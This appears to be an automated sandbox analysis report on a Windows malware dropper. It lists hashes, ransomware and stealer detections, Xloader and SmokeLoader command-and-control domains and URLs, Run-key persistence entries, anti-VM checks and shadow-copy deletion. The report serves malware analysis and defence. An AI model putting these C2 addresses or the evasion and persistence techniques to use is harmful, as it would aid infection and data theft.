Resubmissions
26-08-2021 15:30
210826-eqjwc3wpfa 1026-08-2021 15:06
210826-zjkk6mr366 1026-08-2021 14:31
210826-mw2gr11d6j 1026-08-2021 01:04
210826-5ld5kf1zrj 1026-08-2021 01:03
210826-32mdflhtr6 1026-08-2021 00:58
210826-6fpc34ct8x 1026-08-2021 00:41
210826-ylmpk9586e 1026-08-2021 00:31
210826-pygyb6r89x 10Analysis
-
max time kernel
1802s -
max time network
1813s -
platform
windows11_x64 -
resource
win11 -
submitted
26-08-2021 01:03
Static task
static1
Behavioral task
behavioral1
Sample
71E2CF4709767EAB8E0E6DCD8F19D37C.exe
Resource
win11
General
-
Target
71E2CF4709767EAB8E0E6DCD8F19D37C.exe
-
Size
5.2MB
-
MD5
71e2cf4709767eab8e0e6dcd8f19d37c
-
SHA1
0641acedc06c13a17d94968e3237c4d9533fc0b9
-
SHA256
077ac4018bc25a85796c54e06872071d561df272188dde34daca7e5d01e950fd
-
SHA512
686cae3db08ad1c7beaf13758a74cae4eb4084d152be49510c11a13010cbb27a1407657fab57d0d732648e91e21862c0604a9ad789e55bcac803fc7be6b4b675
Malware Config
Extracted
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
buran
Extracted
xloader
2.3
ec33
http://www.chaturvedi.fyi/ec33/
ride-hard.net
westindiesofficial.com
technewcomer.com
anwen.ink
smarthumanresource.com
aspenhillgetaway.com
westinventures.com
sercomp.pro
fitwoop.com
advertisingviews.site
stinato.com
kidsfundshoes.com
xaufuture.com
emaildesktophelp.com
hey-events.com
v-j9.com
eurekabox.net
export-rice.net
arcadems.com
thejackparker.com
paikewatch.com
genetics-nutrition.com
promoterconnect.com
shanghaihousechelmsford.com
csatec.com
michelevandykedc.com
guytongeorgiahomes.com
streetindo.com
webhost.directory
tohilldentistrysomerset.com
rocketcompaniessucks.net
stuconnect-app.com
outfitideas.today
xlht114.com
skandlstal.com
gonzalezpartyrentals.com
sabaigame.com
findthebestpricecar.com
amberandtomyoutube.com
ecopylesos.online
fineenclave.com
lbm120.com
x2emails.xyz
southernsidesolar.com
apptopshop.com
emilyreynoldsdesign.com
saraheve.com
356892.com
apsservicos.com
watertowerguy.com
streampee.com
dealndesign.com
cleanasbest.com
504cares.com
aaaemploymentagency.com
xtodosmexico.com
century21guyana.com
oisinreynolds.com
itsrightreview.com
affinitychin.guru
riderswall.com
investolog.com
lwwtrtwcf.icu
9968-info.com
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Glupteba Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/6796-390-0x00000000052A0000-0x0000000005BC6000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1504 4816 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6224 4816 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/7156-513-0x0000000005910000-0x0000000005EB6000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 22 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exePING.EXEWerFault.exeWerFault.exeWerFault.exenotepad.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 2912 created 5716 2912 WerFault.exe Mon00f61d292f523.exe PID 5560 created 5128 5560 WerFault.exe md8_8eus.exe PID 5332 created 5960 5332 WerFault.exe Mon00a4b905d6fcf0a9.exe PID 6188 created 6468 6188 WerFault.exe rundll32.exe PID 3264 created 6772 3264 WerFault.exe lgqw6xe2U_T8KcnVrPXg4e3S.exe PID 6476 created 6440 6476 WerFault.exe Nq_3F5ekjxAFw0C9puS4Fehc.exe PID 5260 created 5544 5260 WerFault.exe explorer.exe PID 2284 created 5336 2284 PING.EXE rundll32.exe PID 6548 created 3624 6548 WerFault.exe WerFault.exe PID 3196 created 720 3196 WerFault.exe sfDwcltTn4GsBKM_Hu2EqxdJ.exe PID 2808 created 2380 2808 WerFault.exe StuWzOHhE5uh6G5HONiqHht3.exe PID 4592 created 6796 4592 notepad.exe YsajQFAfcsspPaWnUuSSrlFc.exe PID 6452 created 6356 6452 iABSwCq9xEEiihZKEGl3NhzE.exe PID 3024 created 6432 3024 WerFault.exe Amica.exe.com PID 3624 created 6292 3624 WerFault.exe tvu91LP1ztkkTQGIrTRUNBH_.exe PID 6804 created 6812 6804 WerFault.exe WeitOOFgEpAbhQaUpI5l8OGp.exe PID 6152 created 6468 6152 WerFault.exe rundll32.exe PID 6936 created 5228 6936 WerFault.exe 6BEB.exe PID 5536 created 4884 5536 7989597.exe PID 3972 created 2932 3972 WerFault.exe 2589432.exe PID 6696 created 6444 6696 WerFault.exe explorer.exe PID 6220 created 496 6220 WerFault.exe 9540.exe -
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral1/memory/5960-233-0x0000000002930000-0x00000000029CD000-memory.dmp family_vidar behavioral1/memory/6468-336-0x0000000004A60000-0x0000000004AFD000-memory.dmp family_vidar -
Xloader Payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\test.exe xloader C:\Users\Admin\AppData\Local\Temp\test.exe xloader behavioral1/memory/908-352-0x0000000000740000-0x0000000000768000-memory.dmp xloader -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS4650C293\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4650C293\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4650C293\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4650C293\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4650C293\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS4650C293\libcurlpp.dll aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
setup_install.exeMon001af0f6251.exeMon0001207aa1161f.exeMon00e8b91b250904.exeMon000d7b2b59b9.exeMon0015a1e17ea5.exeMon00a4b905d6fcf0a9.exeMon00b1849cf0bf91e9.exeMon00f61d292f523.exeMon00271bbb5e.exeMon000d7b2b59b9.exeLzmwAqmV.exeChrome 5.exetest.exeDllHost.exeexplorer.exeWerFault.exe4.exe5.exe6.exe5.tmpSK60YKig2V4zoBUiGScf6z94.exe5JdvbFzz5mlDvs0aBY2GW8QG.exef9kpkTIv_7sacBa4AgtedA10.exeCilL84Z3K9TwE9OeT2_8H7Cj.exemqZaRVtHqF8rycvtbmKpqRN4.exetvu91LP1ztkkTQGIrTRUNBH_.exeygmMAvbLwau6uzydIDUf0r01.exe3VtLOyuSluoEP4r0Sz3DJnoG.exeiABSwCq9xEEiihZKEGl3NhzE.exeAmica.exe.comNq_3F5ekjxAFw0C9puS4Fehc.exeConhost.exerundll32.exeNlEyHgR5tpkeMGof82h6WWZE.exelgqw6xe2U_T8KcnVrPXg4e3S.exeYsajQFAfcsspPaWnUuSSrlFc.exeWeitOOFgEpAbhQaUpI5l8OGp.exewvmD8oKBBaVONnn11oGH1rUI.exe7.exe7sjvPdTv85_dDN7p79YDscqa.exeB9NHu0grQz6OXEWRIPx6jRwF.exeXi4HqKZZXc1thEIujg7aeJVU.exesfDwcltTn4GsBKM_Hu2EqxdJ.exeStuWzOHhE5uh6G5HONiqHht3.exeXi4HqKZZXc1thEIujg7aeJVU.exeAmica.exe.comBearVpn 3.exe5.executm3.exe5.tmpmd8_8eus.exeinst1.exeexplorer.exejooyu.exe72VIZoJACbUqw_i9cfs1uNHk.exeservices64.exe3VtLOyuSluoEP4r0Sz3DJnoG.exetmpF293_tmp.exeAmica.exe.comjfiag3g_gg.exe7989597.exe3VtLOyuSluoEP4r0Sz3DJnoG.exerz_vzw.exepid process 5720 setup_install.exe 5128 Mon001af0f6251.exe 1712 Mon0001207aa1161f.exe 5544 Mon00e8b91b250904.exe 5640 Mon000d7b2b59b9.exe 5792 Mon0015a1e17ea5.exe 5960 Mon00a4b905d6fcf0a9.exe 6092 Mon00b1849cf0bf91e9.exe 5716 Mon00f61d292f523.exe 6136 Mon00271bbb5e.exe 5936 Mon000d7b2b59b9.exe 5592 LzmwAqmV.exe 5876 Chrome 5.exe 3932 test.exe 5664 DllHost.exe 5544 explorer.exe 3624 WerFault.exe 1308 4.exe 5792 5.exe 4160 6.exe 6196 5.tmp 6212 SK60YKig2V4zoBUiGScf6z94.exe 6228 5JdvbFzz5mlDvs0aBY2GW8QG.exe 6240 f9kpkTIv_7sacBa4AgtedA10.exe 6256 CilL84Z3K9TwE9OeT2_8H7Cj.exe 6308 mqZaRVtHqF8rycvtbmKpqRN4.exe 6292 tvu91LP1ztkkTQGIrTRUNBH_.exe 6300 ygmMAvbLwau6uzydIDUf0r01.exe 6328 3VtLOyuSluoEP4r0Sz3DJnoG.exe 6356 iABSwCq9xEEiihZKEGl3NhzE.exe 6432 Amica.exe.com 6440 Nq_3F5ekjxAFw0C9puS4Fehc.exe 6460 Conhost.exe 6468 rundll32.exe 6664 NlEyHgR5tpkeMGof82h6WWZE.exe 6772 lgqw6xe2U_T8KcnVrPXg4e3S.exe 6796 YsajQFAfcsspPaWnUuSSrlFc.exe 6812 WeitOOFgEpAbhQaUpI5l8OGp.exe 6972 wvmD8oKBBaVONnn11oGH1rUI.exe 7000 7.exe 7028 7sjvPdTv85_dDN7p79YDscqa.exe 7144 B9NHu0grQz6OXEWRIPx6jRwF.exe 6180 Xi4HqKZZXc1thEIujg7aeJVU.exe 720 sfDwcltTn4GsBKM_Hu2EqxdJ.exe 2380 StuWzOHhE5uh6G5HONiqHht3.exe 6508 Xi4HqKZZXc1thEIujg7aeJVU.exe 1944 Amica.exe.com 1428 BearVpn 3.exe 2584 5.exe 3152 cutm3.exe 6684 5.tmp 5128 md8_8eus.exe 868 inst1.exe 5748 explorer.exe 7020 jooyu.exe 6544 72VIZoJACbUqw_i9cfs1uNHk.exe 6204 services64.exe 2444 3VtLOyuSluoEP4r0Sz3DJnoG.exe 3320 tmpF293_tmp.exe 4808 Amica.exe.com 3060 jfiag3g_gg.exe 4884 7989597.exe 7156 3VtLOyuSluoEP4r0Sz3DJnoG.exe 2112 rz_vzw.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
CilL84Z3K9TwE9OeT2_8H7Cj.exe90F9.exe5JdvbFzz5mlDvs0aBY2GW8QG.exeB9NHu0grQz6OXEWRIPx6jRwF.exe85DC.exe9C94.exemqZaRVtHqF8rycvtbmKpqRN4.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CilL84Z3K9TwE9OeT2_8H7Cj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 90F9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5JdvbFzz5mlDvs0aBY2GW8QG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5JdvbFzz5mlDvs0aBY2GW8QG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion B9NHu0grQz6OXEWRIPx6jRwF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 85DC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 90F9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 85DC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9C94.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9C94.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CilL84Z3K9TwE9OeT2_8H7Cj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mqZaRVtHqF8rycvtbmKpqRN4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mqZaRVtHqF8rycvtbmKpqRN4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion B9NHu0grQz6OXEWRIPx6jRwF.exe -
Loads dropped DLL 10 IoCs
Processes:
setup_install.exe5.tmprundll32.exe5.tmprundll32.exerundll32.exepid process 5720 setup_install.exe 5720 setup_install.exe 5720 setup_install.exe 5720 setup_install.exe 5720 setup_install.exe 6196 5.tmp 5336 rundll32.exe 6684 5.tmp 6688 rundll32.exe 6468 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\mqZaRVtHqF8rycvtbmKpqRN4.exe themida C:\Users\Admin\Documents\CilL84Z3K9TwE9OeT2_8H7Cj.exe themida C:\Users\Admin\Documents\5JdvbFzz5mlDvs0aBY2GW8QG.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
Mon00b1849cf0bf91e9.exerz_vzw.exe9540.exemstsc.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Mon00b1849cf0bf91e9.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Mon00b1849cf0bf91e9.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" rz_vzw.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run 9540.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\csrss.exe\" -start" 9540.exe Key created \Registry\Machine\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run mstsc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\M4CLBD_H1 = "C:\\Program Files (x86)\\P3f8p\\rz_vzw.exe" mstsc.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
85DC.exe90F9.exe9C94.exeCilL84Z3K9TwE9OeT2_8H7Cj.exe5JdvbFzz5mlDvs0aBY2GW8QG.exeB9NHu0grQz6OXEWRIPx6jRwF.exemqZaRVtHqF8rycvtbmKpqRN4.exemd8_8eus.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 85DC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 90F9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9C94.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CilL84Z3K9TwE9OeT2_8H7Cj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5JdvbFzz5mlDvs0aBY2GW8QG.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA B9NHu0grQz6OXEWRIPx6jRwF.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mqZaRVtHqF8rycvtbmKpqRN4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
9540.execsrss.exedescription ioc process File opened (read-only) \??\Z: 9540.exe File opened (read-only) \??\M: 9540.exe File opened (read-only) \??\K: 9540.exe File opened (read-only) \??\E: 9540.exe File opened (read-only) \??\Y: csrss.exe File opened (read-only) \??\K: csrss.exe File opened (read-only) \??\F: csrss.exe File opened (read-only) \??\M: csrss.exe File opened (read-only) \??\T: 9540.exe File opened (read-only) \??\N: 9540.exe File opened (read-only) \??\L: 9540.exe File opened (read-only) \??\J: 9540.exe File opened (read-only) \??\G: 9540.exe File opened (read-only) \??\W: csrss.exe File opened (read-only) \??\S: csrss.exe File opened (read-only) \??\J: csrss.exe File opened (read-only) \??\V: 9540.exe File opened (read-only) \??\O: 9540.exe File opened (read-only) \??\E: csrss.exe File opened (read-only) \??\B: csrss.exe File opened (read-only) \??\Y: 9540.exe File opened (read-only) \??\U: 9540.exe File opened (read-only) \??\Q: 9540.exe File opened (read-only) \??\P: 9540.exe File opened (read-only) \??\V: csrss.exe File opened (read-only) \??\Q: csrss.exe File opened (read-only) \??\H: csrss.exe File opened (read-only) \??\S: 9540.exe File opened (read-only) \??\I: 9540.exe File opened (read-only) \??\H: 9540.exe File opened (read-only) \??\A: 9540.exe File opened (read-only) \??\O: csrss.exe File opened (read-only) \??\I: csrss.exe File opened (read-only) \??\X: 9540.exe File opened (read-only) \??\F: 9540.exe File opened (read-only) \??\B: 9540.exe File opened (read-only) \??\X: csrss.exe File opened (read-only) \??\R: csrss.exe File opened (read-only) \??\P: csrss.exe File opened (read-only) \??\N: csrss.exe File opened (read-only) \??\T: csrss.exe File opened (read-only) \??\A: csrss.exe File opened (read-only) \??\W: 9540.exe File opened (read-only) \??\R: 9540.exe File opened (read-only) \??\Z: csrss.exe File opened (read-only) \??\U: csrss.exe File opened (read-only) \??\L: csrss.exe File opened (read-only) \??\G: csrss.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 ip-api.com 10 geoiptool.com 29 ipinfo.io 49 ipinfo.io 106 ipinfo.io 126 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
Processes:
5JdvbFzz5mlDvs0aBY2GW8QG.exeCilL84Z3K9TwE9OeT2_8H7Cj.exeB9NHu0grQz6OXEWRIPx6jRwF.exemqZaRVtHqF8rycvtbmKpqRN4.exe85DC.exe90F9.exe9C94.exepid process 6228 5JdvbFzz5mlDvs0aBY2GW8QG.exe 6256 CilL84Z3K9TwE9OeT2_8H7Cj.exe 7144 B9NHu0grQz6OXEWRIPx6jRwF.exe 6308 mqZaRVtHqF8rycvtbmKpqRN4.exe 5320 85DC.exe 788 90F9.exe 3492 9C94.exe -
Suspicious use of SetThreadContext 14 IoCs
Processes:
test.exeXi4HqKZZXc1thEIujg7aeJVU.exeConhost.exe3VtLOyuSluoEP4r0Sz3DJnoG.exemstsc.exeservices64.exedescription pid process target process PID 3932 set thread context of 3120 3932 test.exe Explorer.EXE PID 6180 set thread context of 6508 6180 Xi4HqKZZXc1thEIujg7aeJVU.exe Xi4HqKZZXc1thEIujg7aeJVU.exe PID 6460 set thread context of 6544 6460 Conhost.exe 72VIZoJACbUqw_i9cfs1uNHk.exe PID 6328 set thread context of 7156 6328 3VtLOyuSluoEP4r0Sz3DJnoG.exe 3VtLOyuSluoEP4r0Sz3DJnoG.exe PID 908 set thread context of 3120 908 mstsc.exe Explorer.EXE PID 6204 set thread context of 2848 6204 services64.exe explorer.exe PID 908 set thread context of 2848 908 mstsc.exe explorer.exe PID 908 set thread context of 1548 908 mstsc.exe explorer.exe PID 908 set thread context of 4164 908 mstsc.exe explorer.exe PID 908 set thread context of 5748 908 mstsc.exe explorer.exe PID 908 set thread context of 4076 908 mstsc.exe explorer.exe PID 908 set thread context of 6604 908 mstsc.exe explorer.exe PID 908 set thread context of 5544 908 mstsc.exe explorer.exe PID 908 set thread context of 6880 908 mstsc.exe explorer.exe -
Drops file in Program Files directory 64 IoCs
Processes:
csrss.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Getstarted_10.2.41172.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TipsAppList.scale-125_contrast-black.png csrss.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Paint_10.2104.17.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.2.2_2.2.28604.0_x64__8wekyb3d8bbwe\logo.png csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-ul-phn.xrm-ms.payfast290.2B2-819-10A csrss.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Generic-Light.scale-300.png csrss.exe File opened for modification C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib\Pickers.js csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_1.0.38.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-32_altform-unplated_contrast-white.png csrss.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_12104.1001.1.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\LibrarySquare150x150Logo.scale-125.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_1.0.38.0_x64__8wekyb3d8bbwe\Assets\AlarmsSmallTile.scale-200.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_1.0.42.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderLargeTile.scale-100_contrast-white.png csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessVL_MAK-ul-phn.xrm-ms csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\LargeTile.scale-125.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21061.10121.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-48_altform-lightunplated.png csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\BLUECALM.ELM csrss.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-black\LinkedInboxLargeTile.scale-125.png csrss.exe File created C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-amd\components\DetailsList\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_10.3.41661.0_x64__8wekyb3d8bbwe\Assets\TipsAppList.targetsize-80_contrast-white.png csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ViewOnly_ZeroGrace-ppd.xrm-ms csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\msipc.dll.mui csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\WeatherAppList.targetsize-36_altform-lightunplated_contrast-white.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.24.10001.0_x64__8wekyb3d8bbwe\winsdkfb\FBObject.xml csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessDemoR_BypassTrial365-ppd.xrm-ms csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL_F_COL.HXK csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\as90.xsl csrss.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\THMBNAIL.PNG csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\NewsAppList.targetsize-32_contrast-black.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2103.8.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-40_altform-lightunplated.png csrss.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailMediumTile.scale-150.png csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_Subscription-ul-oob.xrm-ms.payfast290.2B2-819-10A csrss.exe File opened for modification C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib\components\DetailsList\DetailsRow.js csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_Retail-pl.xrm-ms.payfast290.2B2-819-10A csrss.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\1033\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.11591.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-72_contrast-black.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_10.3.41661.0_x64__8wekyb3d8bbwe\Assets\TipsSplashScreen.scale-100_contrast-black.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-150_contrast-white.png csrss.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-20.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_12105.1001.23.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\StoreAppList.targetsize-36.png csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-ul-phn.xrm-ms csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\da\msipc.dll.mui csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\DESIGNER\MSADDNDR.OLB csrss.exe File opened for modification C:\Program 